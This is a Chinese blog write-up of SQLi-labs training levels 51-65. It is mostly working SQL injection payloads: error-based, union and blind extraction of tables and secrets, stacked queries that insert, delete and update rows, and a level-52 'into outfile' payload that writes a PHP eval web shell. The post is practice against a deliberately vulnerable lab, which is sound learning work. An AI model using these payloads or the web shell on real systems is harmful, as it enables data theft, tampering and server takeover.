SQLi-labs靶场(51-65)过关超详细0基础

最新推荐文章于 2024-11-12 20:35:48 发布
最新推荐文章于 2024-11-12 20:35:48 发布
阅读量517 收藏 7
点赞数 10
分类专栏: sqli-labs 文章标签: 数据库 sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67803321/article/details/140833733
版权

第五十一关

?sort=1'

判断为单引号闭合且存在报错信息

使用报错注入(也可以用堆叠注入)

?sort=1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+

爆库

?sort=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+

爆表

?sort=1' and updatexml(1,concat(0x7e,mid((select group_concat(column_name) from information_schema.columns where table_name='users'),120,31),0x7e),1)--+

爆列

?sort=1' and updatexml(1,concat(0x7e,mid((select group_concat(username,password) from users),1,31),0x7e),1)--+

爆字段

过关

第五十二关

没有闭合,且不存在报错信息,可以使用盲注,也可以使用堆叠注入

也可以注入后门

?sort=1 into outfile "C:\\phpstudy_pro\\WWW\\sqli-labs\\Less-52\\1.php" lines terminated by '<?php @eval($_POST[admin]);?>'--+

启动蚁剑,登录成功

过关

第五十三关

与五十二关一样,但是单引号闭合

可以使用堆叠注入,盲注,后门

这里演示以下堆叠注入,演示增删改操作

?sort=1';insert into users(id,username,password) values ('111','111','111')--+

?sort=1';delete from users where id='111'--+

?sort=1';update users set username='admin5' where username='admin4'--+

第五十四关

这关是随机挑战,需要获取密钥,但是需要在10步内

?id=1'

确定闭合

?id=-1' union select 1,2,3--+

判断显位

?id=-1' union select 1,2,database()--+

爆库challenges

?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')--+

爆表名

?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='mvv1nn64zf')--+

爆列名

?id=-1' union select 1,2,(select group_concat(id,'/',sessid,'/',secret_5FHO,'/',tryy) from mvv1nn64zf)--+

爆出字段

选择secret_5FHO中的内容,输入输入框

轻轻松松,10次太简单了

过关

第 五十五关

这次有14次的机会

?id=1

?id=1’  ?id=1”  ?id=1’)   ?id=1”)

然后机会快用完了才发现是括号闭合T-T

只能开第二把了

?id=-1) union select 1,2,3--+

?id=-1) union select 1,2,database()--+

?id=-1) union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')--+

?id=-1) union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='manofsa2g0')--+

?id=-1) union select 1,2,(select group_concat(secret_9XH6) from manofsa2g0)--+

虽然从开了一把,但也是简简单单

第五十六关

先测闭合点

?id=1’

?id=1”  ?id=1’)

?id=-1')union select 1,2,3--+

?id=-1')union select 1,2,database()--+

?id=-1')union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')--+

?id=-1')union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='vlkpiyycoq')--+

打错字了一回合,我测

?id=-1')union select 1,2,(select group_concat(secret_1STI) from vlkpiyycoq)--+

EZ

第五十七关

?id=1’

?id=1”

?id=-1" union select 1,2,3--+

?id=-1" union select 1,2,database()--+

?id=-1" union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')--+

?id=-1" union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='qkcor9i3g2')--+

经典手滑一轮

?id=-1" union select 1,2,(select group_concat(secret_EO47) from qkcor9i3g2)--+

Ez,轻松通过

第五十八关

WTF 五轮内解决战斗吗,我承认说大话了

?id=1” 不报错

?id=1’ 报错

这就过去两轮了,联合查询应该是不够了,没办法了,

对他使用报错注入吧(好像需要的访问次数是一样的)

?id=1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+

?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='cq8hx5v69s'),0x7e),1)--+

还是……不够吗,看来闭合点只能用一回合蒙中

于是,我重生了,重生到了刚做第五十八关的那一分钟

带着前世的记忆,我很快就知道了闭合点是单引号闭合

?id=1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+

?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='o9xk176ndu'),0x7e),1)--+

?id=1' and updatexml(1,concat(0x7e,(select group_concat(secret_CVDY) from o9xk176ndu),0x7e),1)--+

Ok这一次还留了一个容错过关

第五十九关

这一次也是只有5次访问机会

也是重生了无数把,发现没有闭合..

?id=1 and updatexml(1,concat(0x7e,database(),0x7e),1)--+

?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+

?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='vja9wi493z'),0x7e),1)--+

?id=1 and updatexml(1,concat(0x7e,(select group_concat(secret_DW74) from vja9wi493z),0x7e),1)--+

第六十关

?id=1"

?id=1")

?id=1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+

突然发现数据库名好像题目里有,可以省一回合

?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='0hv26p3u0f'),0x7e),1)--+

?id=1") and updatexml(1,concat(0x7e,(select group_concat(secret_MB6W) from 0hv26p3u0f),0x7e),1)--+

第六十一关

?id=1'

?id=1')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+

?id=1')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='0zukq3u44c'),0x7e),1)--+

?id=1')) and updatexml(1,concat(0x7e,(select group_concat(secret_F5K0) from 0zukq3u44c),0x7e),1)--+

第六十二关

这里看到限制130次,应该是要盲注了

?id=1' and length(database())>1--+

?id=1" and length(database())>1--+

?id=1") and length(database())>1--+

?id=1') and length(database())>1--+

还是先确定闭合点,确定为单引号括号闭合

?id=1') and length(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1))=10--+

确定表名有10位

?id=1') and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='8'--+

确定表第一位是8(通过burp爆破,用burp就可以绕过次数限制了嘻嘻)

?id=1') and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,10)='8q4r8rhld3'--+

依次推出8q4r8rhld3

?id=1') and length(substr((select column_name from information_schema.columns where table_name='8q4r8rhld3'limit 0,1),1))=2--+

确定第一列有2位

?id=1') and length(substr((select column_name from information_schema.columns where table_name='8q4r8rhld3'limit 1,1),1))=6--+

第二列6位

?id=1') and length(substr((select column_name from information_schema.columns where table_name='8q4r8rhld3'limit 2,1),1))=11--+

第三列11位

?id=1') and length(substr((select column_name from information_schema.columns where table_name='8q4r8rhld3'limit 3,1),1))=4--+

第四列4位

?id=1') and substr((select column_name from information_schema.columns where table_name='8q4r8rhld3'limit 2,1),1,1)='§a§'--+

依次爆破第三列名的全部字符

?id=1') and substr((select column_name from information_schema.columns where table_name='8q4r8rhld3'limit 2,1),1,11)='secret_1jo0'--+

第三列名是secret_1jo0

?id=1') and length(substr((select secret_1jo0 from 8q4r8rhld3 limit 0,1),1))=24--+

得到这列下面的第一个字符有24位,晕

?id=1') and substr((select secret_1jo0 from 8q4r8rhld3 limit 0,1),1,1)='§a§'--+

依次爆破最终的密钥

s7ijxbhoqw28vzfut7lz5wwm

第六十三关

(手工注入要晕掉了,实战还是得使用sqlmap)

?id=1' and length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=10--+

#确定表名有10位

?id=1' and substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1,10)='9zuk28x2yo'--+

#推出表名为9zuk28x2yo

?id=1' and length(substr((select column_name from information_schema.columns where table_name='9zuk28x2yo'limit 2,1),1))=11--+

#确定第三列列名有11位

?id=1' and substr((select column_name from information_schema.columns where table_name='9zuk28x2yo'limit 2,1),1,11)='secret_BP5W'--+

#推出列名为secret_BP5W

?id=1' and length(substr((select secret_BP5W from 9zuk28x2yo limit 0,1),1))='24'--+

#字段有24位

?id=1' and substr((select secret_BP5W from 9zuk28x2yo limit 0,1),1,1)='§a§'--+

#依次推出全部的字段

第六十四关

这关为两个括号闭合,与前几关思路相同

?id=1))--+

?id=1)) and length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=10--+

#确定表名有10位

?id=1)) and substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1,10)='o09av5mj2y'--+

#确定表名为o09av5mj2y

?id=1)) and length(substr((select column_name from information_schema.columns where table_name='o09av5mj2y'limit 2,1),1))=11--+

#第三列列名有11位

?id=1)) and substr((select column_name from information_schema.columns where table_name='o09av5mj2y'limit 2,1),1,11)='secret_M6Q9'--+

#列名为secret_M6Q9

?id=1)) and length(substr((select secret_M6Q9 from o09av5mj2y limit 0,1),1))=24--+

#字段长度为24

?id=1)) and substr((select secret_M6Q9 from o09av5mj2y limit 0,1),1,1)='§a§'--+

#依次推出全部的字段

第六十五关

与前几关一致,但是双引号括号闭合

?id=1")and length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=10--+

推出表格名有10位

后面不再赘述

终于结束了,感觉还是偏基础的,巩固以下sql注入蛮好的

sqli-labs靶场
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs靶场challenges第54-75详细
weixin_51566481的博客
08-18 2393
sqlilabs,sql注入
sqlilabs第五十七五十八
m0_73248913的博客
01-16 572
报错注入就可以(布尔注入的话次数不够)(所以我们前面需要做够足够的数据支持)
详细sqli-labs(1-65)通讲解
热门推荐
dreamthe的博客
05-17 16万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs靶场攻略(1-75)
shw_yzh的博客
08-14 1092
sqli-labs靶场级细通攻略
SQL注入-SQLi-LABS靶场1-65完整payload
问彡心的博客
12-27 1336
【代码】SQL注入-SQLi-LABS靶场1-65完整payload。
SQL注入从入门到进阶:sqli-labs靶场笔记
tzyyyyyy的博客
09-26 7149
SQL注入从入门到进阶:sqli-labs全笔记 Less-1~Less64
详细Sqli-labs1~65详解 解题思路+解题步骤+解析
Jay17的博客
08-03 3万+
详细Sqli-labs1~65详解 解题思路+解题步骤+解析 详细详细
SQLi-Labs1~65攻略
Clannad的博客
10-30 9056
文章目录1~10Less-1Less-2Less-3Less-4Less-5Less-6Less-7Less-8Less-9Less-1011~20Less-11Less-12Less-13Less-14Less-15Less-16Less-17Less-18Less-19Less-2021~30Less-21Less-22Less-23Less-24Less-25Less-26Less-27Le...
sqli-labs通全详解
重庆森林不在重庆的博客
10-08 3211
为探讨清楚SQL注入的诸多细节,我们特以经典的sqli-labs为支线进行从入门到进阶的强化训练。在做题过程中,作者把用到的知识进行了全面、详细、系统的总结,所以为了方便学习,查阅完全适配此文的总结是必不可少的(怎么可以光训练不去学习、总结呢)。
Sqli-labs-maste 靶场的下载, phpStudy 下载
09-13
php 环境,sqlmap 注入测试项目:Sqli-labs-maste 一步到位
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
07 Oracle数据库恢复基础解析:从检查点到归档,一步步构建数据安全防线
超哥的博客
11-09 1265
检查点是Oracle数据库中的一个特殊事件,它的作用是将内存中的数据块同步到磁盘上,以确保数据的持久性。简单来说,就是让数据库“记住”到目前为止所有的更改。Redo日志是Oracle用来记录所有数据更改的日志文件。每次对数据库进行修改时,都会先写入Redo日志,然后再写入数据文件。这样,即使系统崩溃,也能通过Redo日志恢复数据。当数据库运行在归档模式下时,一旦当前的Redo日志文件满,Oracle会将其复制到一个安全的存储位置,并标记为已归档。这样可以长期保留Redo日志,便于历史数据的恢复。
【2024最新】springboot网上商城购物系统lw+ppt
最新发布
man2017的博客
11-12 362
开发技术:SpringBoot、php、Python、小程序、SSM、Vue、MySQL、JSP、ElementUI等,文末源码。专栏推荐:SpringBoot项目源码、Vue项目源码、SSM项目源码、微信小程序源码精品专栏:Java精选实战项目源码、Python精选实战项目源码、大数据精选实战项目源码。
Redis - 事务
ketil27的博客
11-08 930
Redis 的事务和MySQL的事务概念上是类似的.都是把⼀系列操作绑定成⼀组.让这⼀组能够批量执 ⾏.弱化的原⼦性:redis没有"回滚机制".只能做到这些操作"批量执⾏".不能做到"⼀个失败就恢复到 初始状态".不保证⼀致性:不涉及"约束". 也没有回滚.MySQL的⼀致性体现的是运⾏事务前和运⾏后,结果都 是合理有效的,不会出现中间⾮法状态.不需要隔离性:也没有隔离级别,因为不会并发执⾏事务(redis单线程处理请求).
随堂测微信小程序ssm+论文源码调试讲解
u014445459的博客
11-11 885
微信小程序,简称小程序,英文名Mini Program,是一种全新的连接用户与服务的方式,可以快速访问、快速传播,并具有良好的使用体验。小程序的主要开发语言是JavaScript,它与普通web的开发有很多相似之处。小程序和普通网页开发并不是相同的东西,是有差异的。网页开发的渲染线程和脚本线程是互斥的,而在小程序中,确实分开的,分别在不同的线程之中运行。
数据库和云服务器哪个便宜一些?
petaexpress的博客
11-12 208
云服务器的价格区间相对更广泛,因为用户可以根据实际需求选择不同配置和性能的服务器。而云数据库的价格则更多地依赖于数据库类型和规格。在相同配置下,云服务器的价格可能会略低于云数据库,但这并不是绝对的,因为两者都有不同的优惠政策和计费方式。
支持PHP7的sqli-labs靶场介绍
3. sqli-labs靶场sqli-labs是一个非常流行的在线学习平台,它提供了一个模拟的环境,其中包含了多个练习卡,每个卡都有一个或多个SQL注入漏洞等待用户发现和利用。通过逐个解决这些卡,学习者可以掌握SQL...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值